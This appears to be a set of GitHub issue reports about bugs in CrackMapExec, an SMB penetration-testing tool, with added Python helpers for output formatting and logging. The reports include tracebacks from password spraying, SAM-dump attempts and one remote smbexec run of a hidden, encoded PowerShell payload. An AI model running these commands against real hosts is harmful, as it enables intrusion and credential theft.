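def to_text(value) -> str:
    """Return value as str; bytes are decoded as UTF-8, replacing undecodable bytes."""
    if isinstance(value, bytes):
        return value.decode("utf-8", errors="replace")
    return str(value)


# Column order for the table; the field names are the ones printed by --lusers.
LUSER_COLUMNS = ("wkui1_username", "wkui1_logon_domain",
                 "wkui1_logon_server", "wkui1_oth_domains")


def group_records(pairs, first_key="wkui1_logon_domain"):
    """Turn the flat (key, value) stream into one dict per user.

    In the --lusers output every record starts with wkui1_logon_domain, so a
    repeat of that key opens a new record.
    """
    records = []
    current = None
    for key, value in pairs:
        if key == first_key or current is None:
            current = {}
            records.append(current)
        current[key] = to_text(value)
    return records


def format_table(records, columns=LUSER_COLUMNS, width=18):
    """Fixed-width, right-aligned columns, like print_att('{:>15} {:>15}'...)."""
    fmt = " ".join(["{:>%d}" % width] * len(columns))
    headers = [c.replace("wkui1_", "").upper() for c in columns]
    lines = [fmt.format(*headers), fmt.format(*["-" * len(h) for h in headers])]
    for rec in records:
        lines.append(fmt.format(*[rec.get(c, "") for c in columns]))
    return "\n".join(lines)


# Constructed sample: the first two records mirror the dump in the lusers issue,
# the third is invented and arrives as raw bytes with an accented user name.
SAMPLE_LUSERS = [
    ("wkui1_logon_domain", "ADYOLO"), ("wkui1_oth_domains", ""),
    ("wkui1_username", "Administrator"), ("wkui1_logon_server", "DC01"),
    ("wkui1_logon_domain", "ADYOLO"), ("wkui1_oth_domains", ""),
    ("wkui1_username", "DC01$"), ("wkui1_logon_server", ""),
    ("wkui1_logon_domain", b"ADYOLO"), ("wkui1_oth_domains", b""),
    ("wkui1_username", b"Invit\xc3\xa9"), ("wkui1_logon_server", b"DC01"),
]


def demo():
    """Render the sample as the tabbed listing the issue asks for."""
    return format_table(group_records(SAMPLE_LUSERS))


if __name__ == "__main__":
    print("[+] 192.168.11.136:445 DC01 Logged on users:")
    print(demo())
```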

impacket installation errors

Great work on a great tool! On my fresh Kali 2.0 install I get the following when trying to run
"pip install -r requirements.txt"

I have attempted to install in a venv and normally.

Downloading/unpacking git+git://github.com/CoreSecurity/impacket (from -r requirements.txt (line 1))
  Cloning git://github.com/CoreSecurity/impacket to /tmp/pip-bxbV3L-build
fatal: unable to connect to github.com:
github.com[0: 192.30.252.130]: errno=Connection timed out

  Complete output from command /usr/bin/git clone -q git://github.com/CoreSecurity/impacket /tmp/pip-bxbV3L-build:

----------------------------------------
Cleaning up...
Command /usr/bin/git clone -q git://github.com/CoreSecurity/impacket /tmp/pip-bxbV3L-build failed with error code 128 in None
Storing debug log for failure in /root/.pip/pip.log

**From pip.log:**

Cloning git://github.com/CoreSecurity/impacket to /tmp/pip-bxbV3L-build
  Found command 'git' at '/usr/bin/git'
  Running command /usr/bin/git clone -q git://github.com/CoreSecurity/impacket /tmp/pip-bxbV3L-build
  Complete output from command /usr/bin/git clone -q git://github.com/CoreSecurity/impacket /tmp/pip-bxbV3L-build:

----------------------------------------
Cleaning up...
Command /usr/bin/git clone -q git://github.com/CoreSecurity/impacket /tmp/pip-bxbV3L-build failed with error code 128 in None
Exception information:
Traceback (most recent call last):
  File "/usr/lib/python2.7/dist-packages/pip/basecommand.py", line 122, in main
    status = self.run(options, args)
  File "/usr/lib/python2.7/dist-packages/pip/commands/install.py", line 290, in run
    requirement_set.prepare_files(finder, force_root_egg_info=self.bundle, bundle=self.bundle)
  File "/usr/lib/python2.7/dist-packages/pip/req.py", line 1198, in prepare_files
    do_download,
  File "/usr/lib/python2.7/dist-packages/pip/req.py", line 1361, in unpack_url
    unpack_vcs_link(link, loc, only_download)
  File "/usr/lib/python2.7/dist-packages/pip/download.py", line 344, in unpack_vcs_link
    vcs_backend.unpack(location)
  File "/usr/lib/python2.7/dist-packages/pip/vcs/__init__.py", line 240, in unpack
    self.obtain(location)
  File "/usr/lib/python2.7/dist-packages/pip/vcs/git.py", line 111, in obtain
    call_subprocess([self.cmd, 'clone', '-q', url, dest])
  File "/usr/lib/python2.7/dist-packages/pip/util.py", line 716, in call_subprocess
    % (command_desc, proc.returncode, cwd))
InstallationError: Command /usr/bin/git clone -q git://github.com/CoreSecurity/impacket /tmp/pip-bxbV3L-build failed with error code 128 in None

Any help would be greatly appreciated.

Some greenlet error

Ran the script with:

./crackmapexec.py -t 25 some-ips.txt -d localhost -u username -p password --execm wmi -X "Import-Module ActiveDirectory; Get-ADGroup"

And just after a few successful login messages but prior to getting any output from the command, this error popped up:

Traceback (most recent call last):
  File "/usr/local/lib/python2.7/dist-packages/gevent/greenlet.py", line 327, in run
    result = self._run(*self.args, **self.kwargs)
  File "/usr/lib/python2.7/threading.py", line 525, in __bootstrap
    self.__bootstrap_inner()
  File "/usr/lib/python2.7/threading.py", line 540, in __bootstrap_inner
    del _limbo[self]
KeyError: <_Timer(Thread-1, stopped daemon 59241488)>
<Greenlet at 0x387f410: <bound method _Timer.__bootstrap of <_Timer(Thread-1, stopped daemon 59241488)>>> failed with KeyError

Script just plowed on. It happened twice, then when I ran it a third time it went away. I have no idea what's causing it, so this is probably unhelpful, but in case you run into it in the future maybe something here will be useful.

AttributeError: 'int' object has no attribute 'decode'

Originally reported by @maaaaz in #28

I'm also experiencing that bug, which is not directly related to encoding but only to the type:

$ python crackmapexec_bug.py -d adyolo -u administrator -p "<password>" 192.168.11.136 --sessions
[*] 192.168.11.136:445 is running Windows 6.3 Build 9600 (name:DC01) (domain:adyolo)
[+] 192.168.11.136:445 Login successful adyolo\administrator:<password>
[+] 192.168.11.136:445 DC01 Current active sessions:
sesi502_cltype_name 
Traceback (most recent call last):
  File "/root/venvcrackmapexec/local/lib/python2.7/site-packages/gevent/greenlet.py", line 327, in run
    result = self._run(*self.args, **self.kwargs)
  File "crackmapexec_bug.py", line 2926, in connect
    print "{} {}".format(fname, yellow(session[fname]))
  File "crackmapexec_bug.py", line 87, in yellow
    return colored(text.decode('utf8'), 'yellow', attrs=['bold'])
AttributeError: 'int' object has no attribute 'decode'
<Greenlet at 0xb682bb6cL: connect('192.168.11.136')> failed with AttributeError

I was able to fix it by modifying the following line
from:

print "{} {}".format(fname, yellow(session[fname]))

to:

print "{} {}".format(fname, yellow(str(session[fname])))

$ python crackmapexec_bug.py -d adyolo -u administrator -p "<password>" 192.168.11.136 --sessions
[*] 192.168.11.136:445 is running Windows 6.3 Build 9600 (name:DC01) (domain:adyolo)
[+] 192.168.11.136:445 Login successful adyolo\administrator:<password>
[+] 192.168.11.136:445 DC01 Current active sessions:
sesi502_cltype_name 
sesi502_time 0
sesi502_user_flags 0
sesi502_username administrator
sesi502_idle_time 0
sesi502_num_opens 0
sesi502_cname 192.168.11.130
sesi502_transport 
sesi502_cltype_name 
sesi502_time 0
sesi502_user_flags 0
sesi502_username administrator
sesi502_idle_time 0
sesi502_num_opens 1
sesi502_cname 192.168.11.130
sesi502_transport

By the way, has the result presentation changed? Wasn't it in columns before?

Another error

11-16-2015 02:22:08 [*] 192.168.193.196:445 is running Windows 6.1 Build 7601 (name:PAVEL-ПК) (domain:PAVEL-ПК)
Traceback (most recent call last):
  File "/usr/local/lib/python2.7/dist-packages/gevent/greenlet.py", line 327, in run
    result = self._run(*self.args, **self.kwargs)
  File "/home/its_0x08/Desktop/exploits/CrackMapExec/core/maingreenlet.py", line 64, in connect
    smb = smart_login(host, smb, domain)
  File "/home/its_0x08/Desktop/exploits/CrackMapExec/core/smartlogin.py", line 132, in smart_login
    smb.kerberosLogin(user, passwd, domain, '', '', settings.args.aesKey)
  File "/usr/local/lib/python2.7/dist-packages/impacket/smbconnection.py", line 270, in kerberosLogin
    return self._SMBConnection.kerberosLogin(user, password, domain, lmhash, nthash, aesKey, kdcHost, TGT, TGS)
  File "/usr/local/lib/python2.7/dist-packages/impacket/smb3.py", line 526, in kerberosLogin
    tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(userName, password, domain, lmhash, nthash, aesKey, kdcHost)
  File "/usr/local/lib/python2.7/dist-packages/impacket/krb5/kerberosv5.py", line 93, in getKerberosTGT
    seq_set(reqBody, 'sname', serverName.components_to_asn1)
  File "/usr/local/lib/python2.7/dist-packages/impacket/krb5/asn1.py", line 71, in seq_set
    seq.setComponentByName(name, builder(component, *args, **kwargs))
  File "/usr/local/lib/python2.7/dist-packages/impacket/krb5/types.py", line 138, in components_to_asn1
    strings.setComponentByPosition(i, c)
  File "/usr/local/lib/python2.7/dist-packages/pyasn1/type/univ.py", line 763, in setComponentByPosition
    value = self._componentType.clone(value=value)
  File "/usr/local/lib/python2.7/dist-packages/pyasn1/type/univ.py", line 328, in clone
    value, tagSet, subtypeSpec, encoding, binValue, hexValue
  File "/usr/local/lib/python2.7/dist-packages/pyasn1/type/univ.py", line 312, in __init__
    base.AbstractSimpleAsn1Item.__init__(self, value, tagSet, subtypeSpec)
  File "/usr/local/lib/python2.7/dist-packages/pyasn1/type/base.py", line 74, in __init__
    value = self.prettyIn(value)
  File "/usr/local/lib/python2.7/dist-packages/pyasn1/type/univ.py", line 340, in prettyIn
    'Can't encode string '%s' with '%s' codec' % (value, self._encoding)
PyAsn1Error: Can't encode string 'PAVEL-\u041f\u041a' with 'us-ascii' codec
<Greenlet at 0xb496989cL: connect('192.168.193.196')> failed with PyAsn1Error

Traceback (most recent call last):
  File "/usr/local/lib/python2.7/dist-packages/gevent/greenlet.py", line 327, in run
    result = self._run(*self.args, **self.kwargs)
  File "/home/its_0x08/Desktop/exploits/CrackMapExec/core/maingreenlet.py", line 56, in connect
    smb.logoff()
  File "/usr/local/lib/python2.7/dist-packages/impacket/smbconnection.py", line 296, in logoff
    return self._SMBConnection.logoff()
  File "/usr/local/lib/python2.7/dist-packages/impacket/smb3.py", line 1234, in logoff
    ans = self.recvSMB(packetID)
  File "/usr/local/lib/python2.7/dist-packages/impacket/smb3.py", line 356, in recvSMB
    data = self._NetBIOSSession.recv_packet(self._timeout)
  File "/usr/local/lib/python2.7/dist-packages/impacket/nmb.py", line 855, in recv_packet
    data = self.__read(timeout)
  File "/usr/local/lib/python2.7/dist-packages/impacket/nmb.py", line 933, in __read
    data = self.read_function(4, timeout)
  File "/usr/local/lib/python2.7/dist-packages/impacket/nmb.py", line 918, in non_polling_read
    raise NetBIOSTimeout
NetBIOSTimeout: The NETBIOS connection with the remote host timed out.
<Greenlet at 0xb652a48cL: connect('192.168.193.35')> failed with NetBIOSTimeout

Windows support

May be an issue or a noob mistake. I have tried to pip install upgrade requirements.txt using the command provided but get errors on gevent when I run crackmapexec.py

Traceback (most recent call last):
  File "crackmapexec.py", line 4, in <module>
    from gevent import monkey
ImportError: No module named gevent

I have also attached the pip.log

C:\Python27\Scripts\pip run on 09/14/15 15:03:37
Downloading/unpacking cython
Getting page https://pypi.python.org/simple/cython/
URLs to search for versions for cython:

operable program or batch file.

Running 'make ' in c:\users\pathName_ad~1\appdata\local\temp\pip_build_JC\gevent

Traceback (most recent call last):
  File "<string>", line 1, in <module>
  File "c:\users\pathName_ad~1\appdata\local\temp\pip_build_JC\gevent\setup.py", line 408, in <module>
    run_setup(ext_modules, run_make=run_make)
  File "c:\users\pathName_ad~1\appdata\local\temp\pip_build_JC\gevent\setup.py", line 366, in run_setup
    make()
  File "c:\users\pathName_ad~1\appdata\local\temp\pip_build_JC\gevent\setup.py", line 232, in make
    system('make ' + targets)
  File "c:\users\pathName_ad~1\appdata\local\temp\pip_build_JC\gevent\setup.py", line 142, in system
    if _system(cmd):
  File "c:\users\pathName_ad~1\appdata\local\temp\pip_build_JC\gevent\setup.py", line 138, in _system
    return check_call(cmd, shell=True)
  File "C:\Python27\lib\subprocess.py", line 540, in check_call
    raise CalledProcessError(retcode, cmd)
subprocess.CalledProcessError: Command 'make ' returned non-zero exit status 1

Cleaning up...
Removing temporary dir c:\users\pathName_ad~1\appdata\local\temp\pip_build_JC...
Command C:\Python27\python.exe -c "import setuptools, tokenize;__file__='c:\users\pathName_ad~1\appdata\local\temp\pip_build_JC\gevent\setup.py';exec(compile(getattr(tokenize, 'open', open)(__file__).read().replace('\r\n', '\n'), __file__, 'exec'))" install --record c:\users\pathName_ad~1\appdata\local\temp\pip-rv0hz9-record\install-record.txt --single-version-externally-managed --compile failed with error code 1 in c:\users\pathName_ad~1\appdata\local\temp\pip_build_JC\gevent
Exception information:
Traceback (most recent call last):
  File "C:\Python27\lib\site-packages\pip\basecommand.py", line 122, in main
    status = self.run(options, args)
  File "C:\Python27\lib\site-packages\pip\commands\install.py", line 283, in run
    requirement_set.install(install_options, global_options, root=options.root_path)
  File "C:\Python27\lib\site-packages\pip\req.py", line 1435, in install
    requirement.install(install_options, global_options, *args, **kwargs)
  File "C:\Python27\lib\site-packages\pip\req.py", line 706, in install
    cwd=self.source_dir, filter_stdout=self._filter_install, show_stdout=False)
  File "C:\Python27\lib\site-packages\pip\util.py", line 697, in call_subprocess
    % (command_desc, proc.returncode, cwd))
InstallationError: Command C:\Python27\python.exe -c "import setuptools, tokenize;__file__='c:\users\pathName_ad~1\appdata\local\temp\pip_build_JC\gevent\setup.py';exec(compile(getattr(tokenize, 'open', open)(__file__).read().replace('\r\n', '\n'), __file__, 'exec'))" install --record c:\users\pathName_ad~1\appdata\local\temp\pip-rv0hz9-record\install-record.txt --single-version-externally-managed --compile failed with error code 1 in c:\users\pathName_ad~1\appdata\local\temp\pip_build_JC\gevent

Any thoughts?

SessionError: SMB SessionError: STATUS_NETWORK_NAME_DELETED

root@backbox:/home/its_0x08/Desktop/exploits/CrackMapExec# python crackmapexec.py -t 100 192.168.200.0-255
[*] 192.168.200.44:445 is running Windows 6.3 Build 9600 (name:ISIDORO) (domain:ISIDORO)
[*] 192.168.200.68:445 is running Windows 10.0 Build 10240 (name:LS--20150801JUS) (domain:LS--20150801JUS)
[*] 192.168.200.100:445 is running  (name:NAVEEN-UBUNTU) (domain:NAVEEN-UBUNTU)
[*] 192.168.200.85:445 is running Windows 6.1 Build 7601 (name:АМИР-ПК) (domain:АМИР-ПК)
[*] 192.168.200.33:445 is running Windows 6.1 Build 7601 (name:ДЖОКА-ПК) (domain:ДЖОКА-ПК)
[*] 192.168.200.74:445 is running Windows 6.1 Build 7601 (name:USER-PC) (domain:USER-PC)
[*] 192.168.200.10:445 is running Windows 6.1 Build 7601 (name:АЛЕКСАНДР-ПК) (domain:АЛЕКСАНДР-ПК)
[*] 192.168.200.150:445 is running Windows 6.1 Build 7601 (name:ASUS-PC) (domain:ASUS-PC)
[*] 192.168.200.205:445 is running Windows 10.0 Build 10240 (name:VAIO-STIN) (domain:VAIO-STIN)
[*] 192.168.200.193:445 is running Windows 10.0 Build 10240 (name:MSI) (domain:MSI)
[*] 192.168.200.158:445 is running Windows 6.3 Build 9600 (name:HOME_PC) (domain:HOME_PC)
[*] 192.168.200.214:445 is running Windows 6.1 Build 7601 (name:JAMES-PC) (domain:JAMES-PC)
[*] 192.168.200.227:445 is running Windows 6.3 Build 9600 (name:ASUS) (domain:ASUS)
[*] 192.168.200.191:445 is running Windows 10.0 Build 10240 (name:1-VAIO) (domain:1-VAIO)
[*] 192.168.200.241:445 is running Windows 6.1 Build 7601 (name:HI-TECH-PC) (domain:HI-TECH-PC)
[*] 192.168.200.207:445 is running Windows 10.0 Build 10240 (name:KPANGNY) (domain:KPANGNY)
Traceback (most recent call last):
  File "/usr/local/lib/python2.7/dist-packages/gevent/greenlet.py", line 327, in run
    result = self._run(*self.args, **self.kwargs)
  File "crackmapexec.py", line 2906, in connect
    smb = SMBConnection(host, host, None, args.port)
  File "/usr/local/lib/python2.7/dist-packages/impacket/smbconnection.py", line 61, in __init__
    self.negotiateSession(preferredDialect)
  File "/usr/local/lib/python2.7/dist-packages/impacket/smbconnection.py", line 81, in negotiateSession
    self._SMBConnection = smb3.SMB3(self._remoteName, self._remoteHost, self._myName, hostType, self._sess_port, self._timeout, session = self._nmbSession )
  File "/usr/local/lib/python2.7/dist-packages/impacket/smb3.py", line 231, in __init__
    self.negotiateSession(preferredDialect)
  File "/usr/local/lib/python2.7/dist-packages/impacket/smb3.py", line 434, in negotiateSession
    if ans.isValidAnswer(STATUS_SUCCESS):
  File "/usr/local/lib/python2.7/dist-packages/impacket/smb3structs.py", line 430, in isValidAnswer
    raise smb3.SessionError(self['Status'], self)
SessionError: SMB SessionError: STATUS_NETWORK_NAME_DELETED(The network name was deleted.)
<Greenlet at 0xb65934dcL: connect('192.168.200.40')> failed with SessionError

[*] 192.168.200.0:445 is running Windows 6.3 Build 9600 (name:ALINA) (domain:ALINA)
[*] 192.168.200.6:445 is running Windows 6.3 Build 9600 (name:STUDENT) (domain:STUDENT)
^CKeyboardInterrupt
[*] Got CTRL-C! Exiting..
root@backbox:/home/its_0x08/Desktop/exploits/CrackMapExec# 

Add an option to see successful actions only

Hello @byt3bl33d3r,

In the same way as the VERBOSE true|false option in msf, could you add an option to see only successful actions (bruteforcing users, listing stuff, etc.), that is to say, hide the [-] lines for clearer result reporting :)

(venvcrackmapexec)root@kali:~/Partage/CrackMapExec_fork# python crackmapexec.py 192.168.11.136 -u user1 -p passwords.txt
11-29-2015 14:26:23 [*] 192.168.11.136:445 is running Windows 6.3 Build 9600 (name:DC01) (domain:ADYOLO)
11-29-2015 14:26:23 [-] 192.168.11.136:445 ADYOLO\user1:yolo SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)
11-29-2015 14:26:23 [-] 192.168.11.136:445 ADYOLO\user1:swag SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)
11-29-2015 14:26:23 [-] 192.168.11.136:445 ADYOLO\user1:test123! SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)
11-29-2015 14:26:23 [+] 192.168.11.136:445 Login successful ADYOLO\user1:yoloswag1!

Cheers.

error

Traceback (most recent call last):
  File "/Library/Python/2.7/site-packages/gevent/greenlet.py", line 327, in run
    result = self._run(*self.args, **self.kwargs)
  File "crackmapexec.py", line 1766, in connect
    smb.login('' , '')
<<redacted>>
<Greenlet at 0x1047b1190: connect('<<x.x.x.x>>')> failed with error

Needs to handle the exception, maybe?

Domain admin successful execution on PC but with NameError thrown

python crackmapexec.py -t 8 -u USERNAME -p PASSW -d DOMAIN --execm smbexec -x 'powershell.exe -nop -nonl -W Hidden -Enc JAB3AGMAPQBOAGUAdwAtAE8AQgBqAEUAQwBUACAAUwBZAFMAdABlAE0ALgBOAEUAVAAuAFcAZQA7ACAAVwBPAFcANgA0ADsAIABUAHIAaQBkAGUAAOwAgAHIAdgA6ADEAMQAu... ... etc.' 1.2.3.4

[*] 1.2.3.4:445 is running Windows 6.1 Build 7601 (name: PC) (domain: DOMAIN)
[+] 1.2.3.4:445 Login successful DOMAIN\USERNAME:PASSW
Traceback (most recent call last):
  File "/usr/lib/python2.7/dist-packages/gevent/greenlet.py", line 327, in run
    result = self._run(*self.args, **self.kwargs)
  File "crackmapexec.py", line 3118, in connect
    result = executer.run(host)
  File "crackmapexec.py", line 2259, in run
    smb_server = SMBServer()
NameError: global name 'SMBServer' is not defined
<Greenlet at 0x7f496f0c6cd0: connect('1.2.3.4')> failed with NameError

FYI, the IP (1.2.3.4 in the example above) had both a NetBIOS and a DNS name defined.

commit is 9d15d52

Still some encoding issues

@byt3bl33d3r,

It seems that utf-8 is pretty well handled throughout the code, except for parameters passed on the command line (login/password, share name, etc.):

  • In the following example I do have a valid French àlolé user :) :
(venvcrackmapexec)root@kali:~/Partage/CrackMapExec_fork# python crackmapexec.py 192.168.11.136 -u àlolé -p yoloswag1!
11-29-2015 14:42:54 [*] 192.168.11.136:445 is running Windows 6.3 Build 9600 (name:DC01) (domain:ADYOLO)
Traceback (most recent call last):
  File "/root/venvcrackmapexec/local/lib/python2.7/site-packages/gevent/greenlet.py", line 327, in run
    result = self._run(*self.args, **self.kwargs)
  File "/mnt/hgfs/Partage/CrackMapExec_fork/core/maingreenlet.py", line 65, in connect
    smb = smart_login(host, smb, domain)
  File "/mnt/hgfs/Partage/CrackMapExec_fork/core/smartlogin.py", line 173, in smart_login
    print_succ(u"{}:{} Login successful {}\\{}:{}".format(host, settings.args.port, domain, user, passwd))
UnicodeDecodeError: 'ascii' codec can't decode byte 0xc3 in position 0: ordinal not in range(128)
<Greenlet at 0xb6820accL: connect('192.168.11.136')> failed with UnicodeDecodeError
  • In the following example I try to list the valid àéyoloshare share:
(venvcrackmapexec)root@kali:~/Partage/CrackMapExec_fork# python crackmapexec.py 192.168.11.136 -u administrator -p test123! --shares --list àéyoloshare
11-29-2015 14:48:24 [*] 192.168.11.136:445 is running Windows 6.3 Build 9600 (name:DC01) (domain:ADYOLO)
11-29-2015 14:48:24 [+] 192.168.11.136:445 Login successful ADYOLO\administrator:test123!
Traceback (most recent call last):
  File "/root/venvcrackmapexec/local/lib/python2.7/site-packages/gevent/greenlet.py", line 327, in run
    result = self._run(*self.args, **self.kwargs)
  File "/mnt/hgfs/Partage/CrackMapExec_fork/core/maingreenlet.py", line 78, in connect
    rfs.list()
  File "/mnt/hgfs/Partage/CrackMapExec_fork/core/remotefilesystem.py", line 71, in list
    dir_list = self.__smbconnection.listPath(settings.args.share, path)
  File "/root/venvcrackmapexec/local/lib/python2.7/site-packages/impacket/smbconnection.py", line 347, in listPath
    return self._SMBConnection.list_path(shareName, path, password)
  File "/root/venvcrackmapexec/local/lib/python2.7/site-packages/impacket/smb3.py", line 1372, in listPath
    fileId = self.create(treeId, ntpath.dirname(path), FILE_READ_ATTRIBUTES | FILE_READ_DATA ,FILE_SHARE_READ | FILE_SHARE_WRITE |FILE_SHARE_DELETE, FILE_DIRECTORY_FILE | FILE_SYNCHRONOUS_IO_NONALERT, FILE_OPEN, 0)
  File "/root/venvcrackmapexec/local/lib/python2.7/site-packages/impacket/smb3.py", line 915, in create
    smb2Create['Buffer']               = fileName.encode('utf-16le')
UnicodeDecodeError: 'ascii' codec can't decode byte 0xc3 in position 0: ordinal not in range(128)
<Greenlet at 0xb6807accL: connect('192.168.11.136')> failed with UnicodeDecodeError

For the first bug, I managed to fix it with user.decode('utf-8'), so I guess you would need to UTF-8 decode each passed argument:

print_succ(u"{}:{} Login successful {}\\{}:{}".format(host, settings.args.port, domain, user.decode('utf-8'), passwd))

(venvcrackmapexec)root@kali:~/Partage/CrackMapExec_fork# python crackmapexec.py 192.168.11.136 -u àlolé -p yoloswag1!
11-29-2015 14:59:17 [*] 192.168.11.136:445 is running Windows 6.3 Build 9600 (name:DC01) (domain:ADYOLO)
11-29-2015 14:59:17 [+] 192.168.11.136:445 Login successful ADYOLO\àlolé:yoloswag1!

The encoding pain is surely close to its end.

EDIT: following that link, maybe that simple fix should be OK:

parser.add_argument("-u", metavar="USERNAME", dest='user', type=lambda s: unicode(s, 'utf8'), default=None, help="Username(s) or file containing usernames")

EDIT2: the error disappears, but now a wrong username value is passed to the connection and it fails. So UTF-8 decoding should only be done for printing.

Cheers.

Content spidering does not work

Hello @byt3bl33d3r,

I'm trying to use, unsuccessfully, the content spidering feature.
I do have a credz.txt file in the encoding2 folder in the share named share.
The file tree hence looks like this:

C:\SHARE
\---encoding2
    |   credz.txt

The credz.txt file contains:

login:toto
password:titi

Trying the following command does not find the pattern:

$ python crackmapexec_bug.py -d adyolo -u user1 -p "yoloswag1!" 192.168.11.133 -s share --spider encoding2 --content --pattern login
[*] 192.168.11.133:445 is running Windows 6.3 Build 9600 (name:DC01) (domain:adyolo)
[+] 192.168.11.133:445 Login successful adyolo\user1:yoloswag1!
[*] 192.168.11.133:445 DC01 Started spidering
[*] 192.168.11.133:445 DC01 Done spidering (Completed in 0.0693302154541)

What am I doing wrong? :)

Cheers.

Create the logs folder if it does not exist

Hello @byt3bl33d3r,

Currently the script crashes if the logs folder does not exist: would you mind creating it (os.makedirs()) if it can't be found?

$ crackmapexec.exe 192.168.11.129
Traceback (most recent call last):
  File "<string>", line 169, in <module>
  File "core\logger.py", line 27, in setup_logger
  File "C:\Python27\lib\logging\__init__.py", line 911, in __init__
    StreamHandler.__init__(self, self._open())
  File "C:\Python27\lib\logging\__init__.py", line 941, in _open
    stream = open(self.baseFilename, self.mode)
IOError: [Errno 2] No such file or directory: '\\logs\\192.168.11.129_2015-11-27.log'
crackmapexec returned -1

Cheers.
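The two requests above, creating the logs folder when it is missing and a "successful actions only" view that hides the [-] lines (asked for in the "Add an option to see successful actions only" issue), are shown together in the following added example. It is Python 3 code written for this page, not CrackMapExec's own logger; setup_host_logger, the status record attribute, the log_* helpers and the log_path attribute are names assumed here.

```python
"""Per-host log files plus a 'successful actions only' view (added example)."""
import logging
import os
from datetime import date


class SuccessOnlyFilter(logging.Filter):
    """Drop records that were tagged as failures, i.e. the '[-]' lines."""

    def filter(self, record):
        # 'status' is an attribute we attach via logging's extra= (assumption).
        return getattr(record, "status", "info") != "fail"


def setup_host_logger(log_dir, host, success_only=False, when=None):
    """Create log_dir if missing and return a logger writing to
    <log_dir>/<host>_<YYYY-MM-DD>.log (same naming as the issue's traceback)."""
    # The original crashed with IOError when the folder was absent;
    # exist_ok=True makes repeated runs safe as well.
    os.makedirs(log_dir, exist_ok=True)
    when = when or date.today()
    path = os.path.join(log_dir, "{}_{}.log".format(host, when.isoformat()))

    # A private Logger instance (not logging.getLogger) so that calling this
    # once per host never stacks handlers on a shared, cached logger.
    logger = logging.Logger("cme.{}".format(host))
    logger.setLevel(logging.INFO)
    handler = logging.FileHandler(path, encoding="utf-8")
    handler.setFormatter(logging.Formatter("%(asctime)s %(message)s",
                                           datefmt="%m-%d-%Y %H:%M:%S"))
    if success_only:
        handler.addFilter(SuccessOnlyFilter())
    logger.addHandler(handler)
    logger.log_path = path  # convenience attribute for callers (assumption)
    return logger


def log_success(logger, msg):
    logger.info("[+] " + msg, extra={"status": "success"})


def log_failure(logger, msg):
    logger.info("[-] " + msg, extra={"status": "fail"})


def log_info(logger, msg):
    logger.info("[*] " + msg, extra={"status": "info"})


def read_log(logger):
    """Flush the handlers and return the logged messages without timestamps."""
    for h in logger.handlers:
        h.flush()
    with open(logger.log_path, encoding="utf-8") as f:
        # "<date> <time> <message>": keep only the message part.
        return [line.rstrip("\n").split(" ", 2)[2] for line in f]
```

With success_only=True the file receives the [*] and [+] lines only; the failed logon attempts are still emitted by the caller, so switching the option off restores the full record without touching the scanning code.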

ImportError: cannot import name drsuapi

Have the following problem in Kali Linux 2.0

~/CrackMapExec# python crackmapexec.py --help
Traceback (most recent call last):
  File "crackmapexec.py", line 15, in <module>
    from impacket.dcerpc.v5 import transport, scmr, samr, drsuapi, rrp, tsch, srvs, wkst
ImportError: cannot import name drsuapi

Windows support

I haven't tested all functionality, but some minor changes enable this to work with Mimikatz on Windows:

263: log_name = 'Mimikatz-{}-{}.log'.format(self.client_address[0], datetime.now().strftime("%Y-%m-%d_%H:%M:%S"))
264:+ if sys.platform == 'win32':
265:+ log_name = 'Mimikatz-{}-{}.log'.format(self.client_address[0], datetime.now().strftime("%Y-%+m-%d_%H%M%S"))
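Review bot: the win32 branch at 265 uses the format string "%Y-%+m-%d_%H%M%S", and "%+m" is not a directive that Python's strftime documents; depending on the platform C library it either raises ValueError or is passed through literally, so the log file is not named as intended. The goal, no ':' in the name because Windows rejects it in file names, is met by "%Y-%m-%d_%H%M%S", and since that format is just as valid on Linux the simpler change is to use it unconditionally at 263 and drop the platform test. If the branch stays, the added line at 265 has to be indented under the if at 264.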

And also:
3102:- if os.geteuid() is not 0:
3102:+ if sys.platform != 'win32':
3103:+ if os.geteuid() is not 0:
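Review bot: the moved check at 3103 keeps "os.geteuid() is not 0", which compares by identity rather than value; it only works because CPython caches small integers and should read "os.geteuid() != 0". The line at 3103 also has to be indented under the new "if sys.platform != 'win32':" at 3102, otherwise the platform test is a no-op. A more direct guard than the platform string is "if hasattr(os, 'geteuid') and os.geteuid() != 0:", which covers any platform without geteuid rather than win32 alone.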

h

h

Handling rpc_s_access_denied exception

Hello @byt3bl33d3r,

It seems that the rpc_s_access_denied exception, often occurring when a user does not have the required privileges or when the target SMB share is not under Windows but Unix (might happen during an internal pentest with a lot of unsorted targets), is not correctly handled and crashes the whole processing.
The following example shows a user trying to dump SAM dbs whilst not having the administrative privileges:

$ python crackmapexec_bug.py -d adyolo -u user1 -p "yoloswag1!" 192.168.11.136 --sam
[*] 192.168.11.136:445 is running Windows 6.3 Build 9600 (name:DC01) (domain:adyolo)
[+] 192.168.11.136:445 Login successful adyolo\user1:yoloswag1!
Traceback (most recent call last):
  File "crackmapexec_bug.py", line 1644, in dump
    self.__remoteOps.enableRegistry()
  File "crackmapexec_bug.py", line 795, in enableRegistry
    self.__checkServiceStatus()
  File "crackmapexec_bug.py", line 764, in __checkServiceStatus
    ans = scmr.hROpenSCManagerW(self.__scmr)
  File "/root/venvcrackmapexec/local/lib/python2.7/site-packages/impacket/dcerpc/v5/scmr.py", line 1320, in hROpenSCManagerW
    return dce.request(openSCManager)
  File "/root/venvcrackmapexec/local/lib/python2.7/site-packages/impacket/dcerpc/v5/rpcrt.py", line 859, in request
    raise exception
DCERPCException: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied

It would be cool to better handle it and basically pass to the next target.

Cheers.
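Several of the issues above end the same way: one target raises (rpc_s_access_denied here, STATUS_NETWORK_NAME_DELETED, NetBIOSTimeout or the NameError in the smbexec report earlier) and the greenlet dies with a traceback instead of moving on. The following added example shows the per-target wrapper that gives the behaviour the reporter asks for. It is Python 3 code written for this page, not CrackMapExec's; the three exception classes are stand-ins for the impacket errors named in the issues, run_one, run_targets, render and demo_action are names assumed here, and demo_action is a constructed fake keyed on the last octet so the code runs offline.

```python
"""Keep the scan going when one target raises (added example, Python 3)."""
from concurrent.futures import ThreadPoolExecutor


# Stand-ins (assumption): in the real tool these come from impacket.
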